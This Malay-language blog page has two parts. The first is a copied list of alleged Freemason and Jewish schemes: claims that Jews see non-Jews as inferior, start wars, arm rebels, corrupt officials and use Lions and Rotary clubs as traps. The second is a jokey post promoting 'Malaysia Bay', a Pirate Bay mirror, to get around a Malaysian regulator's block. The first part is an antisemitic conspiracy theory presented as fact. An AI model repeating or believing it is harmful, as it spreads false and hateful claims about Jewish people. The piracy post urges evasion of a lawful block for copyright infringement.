Mengharuskan perkara yang haram seperti zina dan memperalatkan wanita bagi
mempengaruhi pemerintah.
Mewujudkan jurang bangsa selain Yahudi kepada beberapa kelas. Mereka menganggap
bangsa selain Yahudi bertaraf rendah dan berusaha melaga-lagakan mereka dengan
mencetuskan perang dan sebagainya.
Membekalkan senjata kepada kumpulan-kumpulan pemberontak.
Menimbulkan perbalahan-perbalahan kaum dibeberapa buah negara dunia.
Meruntuhkan akhlak dengan pelbagai cara seperti menggunakan media massa dengan
membiaya dan menganjur sesuatu program. Ia bertujuan menimbulkan kegelisahan orang ramai yang berpegang pada agama dan berakhlak baik dengan menubuhkan unsur-unsur kekufuran dan keganasan.
Menggalakkan rasuah dan keruntuhan akhlak di kalangan pemimpin-pemimpin dan
pegawai-pegawai kerajaan. Mereka melakukan kegiatan-kegiatan itu bagi memperalatkan
golongan eksekutif.
Menjerat dan mengumpan pemimpin-pemimpin dan orang yang berpengaruh dalam
masyarakat sehingga mereka terpaksa tunduk kepada Freemason.
Menubuhkan beberapa persatuan dan pertubuhan yang dapat menarik golongan kenamaan
supaya masuk ke dalam perangkap mereka. Contohnya pertubuhan Lions, Rotary dan
sebagainya.
Mempengaruhi belia-belia melalui kegiatan tertentu seperti sukan, pelancongan dan
sebagainya.
Mempengaruhi kerajaan supaya menaungi kegiatan-kegiatan yang mereka lakukan.
Melahirkan teori-teori dan ideologi-ideologi yang menyesatkan.
Mempengaruhi pertubuhan-pertubuhan antarabangsa dalam pelbagai bidang samada
politik seperi Pertubuhan Bangsa-bangsa Bersatu, ekonomi dan masyarakat.
tontonlah The Arrival

*dipetik dari internet*

Pirate Bay Offline? Malaysia Bay Online !

Yoo geng ! piratebay tak boleh masuk kan? hahaa..piratebay lah tempat yang selalu orang search macam2 benda, untuk download dan macam-macam lagi larh, websites ni la yang paling popular bagi jenis filesharing.. tapi sekarang dah di block sekian lama..takpe kanda takpe kanda, sekarang jugak dinda pergi................hehe..okay2..dengar citer ada laman web baru semacam piratebay tu..apa dia ek?? ini websites ialah mirror bagi piratebay...baru2 ni Anonymous(hacker) pun menyuarakan bahawa website piratebay ni telah di block dan mereka tidak puas hati sebab internet kegunaan bebas bagi pengguna internet..hahaa..okeyh, pernah dengar MALAYSIA BAY ?? haha kelakar betul namanya, ni lahh mirror bagi websites piratebay tau..


cuba korang tengok dia punya LOGO ! warna bendera MALAYSIA tuhhh..
hahah...lawak2...

okay2..sekarang korang boleh masuk sites piratebay yang kena block melalui http://malaysiabay.org ..jadi cepat2 la masuk sebelum di block semula oleh SKMM..